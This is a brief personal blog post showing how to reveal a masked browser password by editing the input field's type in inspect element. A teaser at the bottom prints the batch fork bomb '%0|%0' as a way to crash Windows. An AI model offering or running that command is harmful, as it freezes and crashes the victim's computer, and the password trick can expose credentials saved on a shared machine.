Monday, February 17, 2014

How to show the passwords instead of asterisks in a web browser

So this is how you can show the actual words instead of the asterisks when you are typing your password to log into something. Right click on the password box and inspect the element.

Go to the input type and change it to text instead of password change it by double clicking.

It should look like this once you are done


Here is an example of what it should look like

 
After you do all of that you should be able to see the password
Please like, subscribe, and follow I would appreciate it J

No comments:

Post a Comment

how to make a batch file to crash windows

here is the "code" %0|%0 paste that in a notepad and save it as whateveryou want.bat for example lol.bat by running this it...